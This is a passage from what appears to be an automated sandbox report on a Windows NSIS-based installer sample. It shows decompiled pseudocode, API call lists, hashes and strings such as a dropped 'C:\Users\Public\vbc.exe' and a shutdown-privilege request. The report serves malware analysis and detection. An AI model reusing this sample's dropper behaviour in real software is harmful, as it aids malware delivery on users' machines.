                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                                                                                                                                                          										lstrcatA(_t157, "\\Temp");
                                                                                                                                                                                                          										_t113 = E00403455(_t173);
                                                                                                                                                                                                          										_t174 = _t113;
                                                                                                                                                                                                          										if(_t113 != 0) {
                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										GetTempPathA(0x3fc, _t157);
                                                                                                                                                                                                          										lstrcatA(_t157, "Low");
                                                                                                                                                                                                          										SetEnvironmentVariableA("TEMP", _t157);
                                                                                                                                                                                                          										SetEnvironmentVariableA("TMP", _t157);
                                                                                                                                                                                                          										_t118 = E00403455(_t174);
                                                                                                                                                                                                          										_t175 = _t118;
                                                                                                                                                                                                          										if(_t118 == 0) {
                                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L33;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t141 = _t55[4];
                                                                                                                                                                                                          								__eflags = _t141 - 0x20;
                                                                                                                                                                                                          								if(_t141 == 0x20) {
                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                          									_t15 = _t164 + 0x20;
                                                                                                                                                                                                          									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                                                                                                                                                          									__eflags =  *_t15;
                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t141;
                                                                                                                                                                                                          								if(_t141 != 0) {
                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t142 = _t55[1];
                                                                                                                                                                                                          							__eflags = _t142 - 0x20;
                                                                                                                                                                                                          							if(_t142 == 0x20) {
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								 *0x42f500 = 1;
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t142;
                                                                                                                                                                                                          							if(_t142 != 0) {
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          						_t55 =  &(_t55[1]);
                                                                                                                                                                                                          						__eflags =  *_t55 - 0x20;
                                                                                                                                                                                                          					} while ( *_t55 == 0x20);
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L30;
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x00403960
                                                                                                                                                                                                          0x00403968
                                                                                                                                                                                                          0x00403968
                                                                                                                                                                                                          0x004038ea
                                                                                                                                                                                                          0x004038f2
                                                                                                                                                                                                          0x004038f4
                                                                                                                                                                                                          0x004038f5
                                                                                                                                                                                                          0x00403902
                                                                                                                                                                                                          0x00403915
                                                                                                                                                                                                          0x0040391d
                                                                                                                                                                                                          0x00403921
                                                                                                                                                                                                          0x00403921
                                                                                                                                                                                                          0x00403929
                                                                                                                                                                                                          0x0040392e
                                                                                                                                                                                                          0x00403935
                                                                                                                                                                                                          0x00403943
                                                                                                                                                                                                          0x00403945
                                                                                                                                                                                                          0x0040394b
                                                                                                                                                                                                          0x0040394d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403937
                                                                                                                                                                                                          0x0040393d
                                                                                                                                                                                                          0x0040393f
                                                                                                                                                                                                          0x00403941
                                                                                                                                                                                                          0x0040394f
                                                                                                                                                                                                          0x00403951
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403951
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403941
                                                                                                                                                                                                          0x00403935
                                                                                                                                                                                                          0x004037bf
                                                                                                                                                                                                          0x004037c6
                                                                                                                                                                                                          0x004037c6
                                                                                                                                                                                                          0x00403718
                                                                                                                                                                                                          0x00403790
                                                                                                                                                                                                          0x00403790
                                                                                                                                                                                                          0x0040379c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040379c
                                                                                                                                                                                                          0x00403721
                                                                                                                                                                                                          0x00403725
                                                                                                                                                                                                          0x0040375b
                                                                                                                                                                                                          0x0040375b
                                                                                                                                                                                                          0x0040375d
                                                                                                                                                                                                          0x00403765
                                                                                                                                                                                                          0x004037d7
                                                                                                                                                                                                          0x004037d9
                                                                                                                                                                                                          0x004037e0
                                                                                                                                                                                                          0x004037e8
                                                                                                                                                                                                          0x004037e8
                                                                                                                                                                                                          0x004037f3
                                                                                                                                                                                                          0x004037f8
                                                                                                                                                                                                          0x00403807
                                                                                                                                                                                                          0x0040380b
                                                                                                                                                                                                          0x0040380c
                                                                                                                                                                                                          0x00403815
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040380e
                                                                                                                                                                                                          0x0040381b
                                                                                                                                                                                                          0x00403821
                                                                                                                                                                                                          0x00403827
                                                                                                                                                                                                          0x0040382f
                                                                                                                                                                                                          0x0040382f
                                                                                                                                                                                                          0x0040383d
                                                                                                                                                                                                          0x00403842
                                                                                                                                                                                                          0x00403854
                                                                                                                                                                                                          0x0040385c
                                                                                                                                                                                                          0x00403862
                                                                                                                                                                                                          0x0040386e
                                                                                                                                                                                                          0x00403874
                                                                                                                                                                                                          0x0040387e
                                                                                                                                                                                                          0x00403894
                                                                                                                                                                                                          0x004038a5
                                                                                                                                                                                                          0x004038ab
                                                                                                                                                                                                          0x004038b2
                                                                                                                                                                                                          0x004038b5
                                                                                                                                                                                                          0x004038bb
                                                                                                                                                                                                          0x004038bb
                                                                                                                                                                                                          0x004038b2
                                                                                                                                                                                                          0x004038bf
                                                                                                                                                                                                          0x004038c5
                                                                                                                                                                                                          0x004038c5
                                                                                                                                                                                                          0x004038ca
                                                                                                                                                                                                          0x004038ca
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403807
                                                                                                                                                                                                          0x00403767
                                                                                                                                                                                                          0x00403769
                                                                                                                                                                                                          0x00403774
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040377c
                                                                                                                                                                                                          0x00403787
                                                                                                                                                                                                          0x0040378c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040378c
                                                                                                                                                                                                          0x00403750
                                                                                                                                                                                                          0x00403752
                                                                                                                                                                                                          0x00403756
                                                                                                                                                                                                          0x00403759
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403759
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403752
                                                                                                                                                                                                          0x004036a2
                                                                                                                                                                                                          0x004036ae
                                                                                                                                                                                                          0x004036b3
                                                                                                                                                                                                          0x004036b8
                                                                                                                                                                                                          0x004036ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004036c2
                                                                                                                                                                                                          0x004036ca
                                                                                                                                                                                                          0x004036db
                                                                                                                                                                                                          0x004036e3
                                                                                                                                                                                                          0x004036e5
                                                                                                                                                                                                          0x004036ea
                                                                                                                                                                                                          0x004036ec
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004036ec
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403651
                                                                                                                                                                                                          0x00403612

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004034B1
                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                                                                                                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00403594
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403691
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004036C2
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                            • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754), ref: 00403B50
                                                                                                                                                                                                            • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                                                                                                            • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                                                                                                            • Part of subcall function 00403A60: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403BB7
                                                                                                                                                                                                            • Part of subcall function 00403A60: RegisterClassA.USER32(0042EBE0), ref: 00403BF4
                                                                                                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(00000184), ref: 00403980
                                                                                                                                                                                                            • Part of subcall function 0040396E: CloseHandle.KERNEL32(00000188), ref: 00403994
                                                                                                                                                                                                          • OleUninitialize.OLE32 ref: 004037A5
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037C6
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403968
                                                                                                                                                                                                            • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                                                                                          • String ID: "$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                          • API String ID: 538718688-3654181138
                                                                                                                                                                                                          • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                                                                                                          • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E72E31A98() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				CHAR* _v24;
                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                          				CHAR* _v48;
                                                                                                                                                                                                          				signed int _v52;
                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				CHAR* _t207;
                                                                                                                                                                                                          				signed int _t210;
                                                                                                                                                                                                          				void* _t212;
                                                                                                                                                                                                          				void* _t214;
                                                                                                                                                                                                          				CHAR* _t216;
                                                                                                                                                                                                          				void* _t224;
                                                                                                                                                                                                          				struct HINSTANCE__* _t225;
                                                                                                                                                                                                          				struct HINSTANCE__* _t226;
                                                                                                                                                                                                          				struct HINSTANCE__* _t228;
                                                                                                                                                                                                          				signed short _t230;
                                                                                                                                                                                                          				struct HINSTANCE__* _t233;
                                                                                                                                                                                                          				struct HINSTANCE__* _t235;
                                                                                                                                                                                                          				void* _t236;
                                                                                                                                                                                                          				char* _t237;
                                                                                                                                                                                                          				void* _t248;
                                                                                                                                                                                                          				signed char _t249;
                                                                                                                                                                                                          				signed int _t250;
                                                                                                                                                                                                          				void* _t254;
                                                                                                                                                                                                          				struct HINSTANCE__* _t256;
                                                                                                                                                                                                          				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E72E31215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E72E31215();
				_t320 = E72E3123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E72E312FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E72E31534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
                                                                                                                                                                                                          								_t320 = _v12;
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t257 = _t212 - 0x23;
                                                                                                                                                                                                          					if(_t257 == 0) {
                                                                                                                                                                                                          						__eflags = _t320 - _v56;
                                                                                                                                                                                                          						if(_t320 <= _v56) {
                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                          							__eflags = _v44 - _t282;
                                                                                                                                                                                                          							if(_v44 != _t282) {
                                                                                                                                                                                                          								L43:
                                                                                                                                                                                                          								_t259 = _v32 - _t282;
                                                                                                                                                                                                          								__eflags = _t259;
                                                                                                                                                                                                          								if(_t259 == 0) {
                                                                                                                                                                                                          									_t260 = _t319;
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										__eflags = _t260 - 0x22;
                                                                                                                                                                                                          										if(_t260 != 0x22) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t320 = _t320 + 1;
                                                                                                                                                                                                          										__eflags = _v44 - _t282;
                                                                                                                                                                                                          										_v12 = _t320;
                                                                                                                                                                                                          										if(_v44 == _t282) {
                                                                                                                                                                                                          											_v44 = 1;
                                                                                                                                                                                                          											L162:
                                                                                                                                                                                                          											_v28 =  &(_v28[1]);
                                                                                                                                                                                                          											 *_v28 =  *_t320;
                                                                                                                                                                                                          											L58:
                                                                                                                                                                                                          											_t328 = _t320 + 1;
                                                                                                                                                                                                          											__eflags = _t328;
                                                                                                                                                                                                          											_v12 = _t328;
                                                                                                                                                                                                          											goto L59;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t260 =  *_t320;
                                                                                                                                                                                                          										_v44 = _t282;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t260 - 0x2a;
                                                                                                                                                                                                          									if(_t260 == 0x2a) {
                                                                                                                                                                                                          										_v36 = 2;
                                                                                                                                                                                                          										L57:
                                                                                                                                                                                                          										_t320 = _v12;
                                                                                                                                                                                                          										_v28 = _v24;
                                                                                                                                                                                                          										_t282 = 0;
                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                          										goto L58;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t260 - 0x2d;
                                                                                                                                                                                                          									if(_t260 == 0x2d) {
                                                                                                                                                                                                          										L151:
                                                                                                                                                                                                          										_t303 =  *_t320;
                                                                                                                                                                                                          										__eflags = _t303 - 0x2d;
                                                                                                                                                                                                          										if(_t303 != 0x2d) {
                                                                                                                                                                                                          											L154:
                                                                                                                                                                                                          											_t263 = _t320 + 1;
                                                                                                                                                                                                          											__eflags =  *_t263 - 0x3a;
                                                                                                                                                                                                          											if( *_t263 != 0x3a) {
                                                                                                                                                                                                          												goto L162;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t303 - 0x2d;
                                                                                                                                                                                                          											if(_t303 == 0x2d) {
                                                                                                                                                                                                          												goto L162;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_v36 = 1;
                                                                                                                                                                                                          											L157:
                                                                                                                                                                                                          											_v12 = _t263;
                                                                                                                                                                                                          											__eflags = _v28 - _v24;
                                                                                                                                                                                                          											if(_v28 <= _v24) {
                                                                                                                                                                                                          												 *_v48 =  *_v48 & 0x00000000;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												 *_v28 =  *_v28 & 0x00000000;
                                                                                                                                                                                                          												lstrcpyA(_v48, _v24);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L57;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t263 = _t320 + 1;
                                                                                                                                                                                                          										__eflags =  *_t263 - 0x3e;
                                                                                                                                                                                                          										if( *_t263 != 0x3e) {
                                                                                                                                                                                                          											goto L154;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v36 = 3;
                                                                                                                                                                                                          										goto L157;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t260 - 0x3a;
                                                                                                                                                                                                          									if(_t260 != 0x3a) {
                                                                                                                                                                                                          										goto L162;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L151;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t268 = _t259 - 1;
                                                                                                                                                                                                          								__eflags = _t268;
                                                                                                                                                                                                          								if(_t268 == 0) {
                                                                                                                                                                                                          									L80:
                                                                                                                                                                                                          									_t304 = _t285 + 0xffffffde;
                                                                                                                                                                                                          									__eflags = _t304 - 0x55;
                                                                                                                                                                                                          									if(_t304 > 0x55) {
                                                                                                                                                                                                          										goto L57;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									switch( *((intOrPtr*)(( *(_t304 + 0x72e32259) & 0x000000ff) * 4 +  &M72E321CD))) {
                                                                                                                                                                                                          										case 0:
                                                                                                                                                                                                          											__eax = _v24;
                                                                                                                                                                                                          											__edi = _v12;
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												__edi = __edi + 1;
                                                                                                                                                                                                          												_v12 = __edi;
                                                                                                                                                                                                          												__cl =  *__edi;
                                                                                                                                                                                                          												__eflags = __cl - __dl;
                                                                                                                                                                                                          												if(__cl != __dl) {
                                                                                                                                                                                                          													goto L132;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L131:
                                                                                                                                                                                                          												__eflags =  *(__edi + 1) - __dl;
                                                                                                                                                                                                          												if( *(__edi + 1) != __dl) {
                                                                                                                                                                                                          													L136:
                                                                                                                                                                                                          													 *__eax =  *__eax & 0x00000000;
                                                                                                                                                                                                          													__eax = E72E31224(_v24);
                                                                                                                                                                                                          													__ebx = __eax;
                                                                                                                                                                                                          													goto L97;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L132:
		__eflags = __cl;
		if(__cl == 0) {
			goto L136;
		}
		__eflags = __cl - __dl;
		if(__cl == __dl) {
			__edi = __edi + 1;
			__eflags = __edi;
		}
		__cl =  *__edi;
		 *__eax =  *__edi;
		__eax = __eax + 1;
		__edi = __edi + 1;
		_v12 = __edi;
		__cl =  *__edi;
		__eflags = __cl - __dl;
		if(__cl != __dl) {
			goto L132;
		}
		goto L131;
	}
case 1:
	_v8 = 1;
	goto L57;
case 2:
	_v8 = _v8 | 0xffffffff;
	goto L57;
case 3:
	_v8 = _v8 & 0x00000000;
	_v20 = _v20 & 0x00000000;
	_v16 = _v16 + 1;
	goto L85;
case 4:
	__eflags = _v20;
	if(_v20 != 0) {
		goto L57;
	}
	_v12 = _v12 - 1;
	__ebx = E72E31215();
	 &_v12 = E72E31A36( &_v12);
	__eax = E72E31429(__edx, __eax, __edx, __ebx);
	goto L97;
case 5:
	L105:
	_v20 = _v20 + 1;
	goto L57;
case 6:
	_push(7);
	goto L123;
case 7:
	_push(0x19);
	goto L143;
case 8:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L107;
case 9:
	_push(0x15);
	goto L143;
case 0xa:
	_push(0x16);
	goto L143;
case 0xb:
	_push(0x18);
	goto L143;
case 0xc:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L118;
case 0xd:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L109;
case 0xe:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L111;
case 0xf:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L122;
case 0x10:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L113;
case 0x11:
	_push(3);
	goto L123;
case 0x12:
	_push(0x17);
	L143:
	_pop(__ebx);
	goto L98;
case 0x13:
	__eax =  &_v12;
	__eax = E72E31A36( &_v12);
	__ebx = __eax;
	__ebx = __eax + 1;
	__eflags = __ebx - 0xb;
	if(__ebx < 0xb) {
		__ebx = __ebx + 0xa;
	}
	goto L97;
case 0x14:
	__ebx = 0xffffffff;
	goto L98;
case 0x15:
	__eax = 0;
	__eflags = 0;
	goto L116;
case 0x16:
	__ecx = 0;
	__eflags = 0;
	goto L91;
case 0x17:
	__eax = 0;
	__eax = 1;
	__eflags = 1;
	goto L120;
case 0x18:
	_t270 =  *(_t329 + 0x814);
	__eflags = _t270 - _v16;
	if(_t270 > _v16) {
		_v16 = _t270;
	}
	_v8 = _v8 & 0x00000000;
	_v20 = _v20 & 0x00000000;
	_v36 - 3 = _t270 - (_v36 == 3);
	if(_t270 != _v36 == 3) {
		L85:
		_v40 = 1;
	}
	goto L57;
case 0x19:
	L107:
	__ecx = 0;
	_v8 = 2;
	__ecx = 1;
	goto L91;
case 0x1a:
	L118:
	_push(5);
	goto L123;
case 0x1b:
	L109:
	__ecx = 0;
	_v8 = 3;
	__ecx = 1;
	goto L91;
case 0x1c:
	L111:
	__ecx = 0;
	__ecx = 1;
	goto L91;
                                                                                                                                                                                                          										case 0x1d:
                                                                                                                                                                                                          											L122:
                                                                                                                                                                                                          											_push(6);
                                                                                                                                                                                                          											goto L123;
                                                                                                                                                                                                          										case 0x1e:
                                                                                                                                                                                                          											L113:
                                                                                                                                                                                                          											_push(2);
                                                                                                                                                                                                          											goto L123;
                                                                                                                                                                                                          										case 0x1f:
                                                                                                                                                                                                          											__eax =  &_v12;
                                                                                                                                                                                                          											__eax = E72E31A36( &_v12);
                                                                                                                                                                                                          											__ebx = __eax;
                                                                                                                                                                                                          											__ebx = __eax + 1;
                                                                                                                                                                                                          											goto L97;
                                                                                                                                                                                                          										case 0x20:
                                                                                                                                                                                                          											L116:
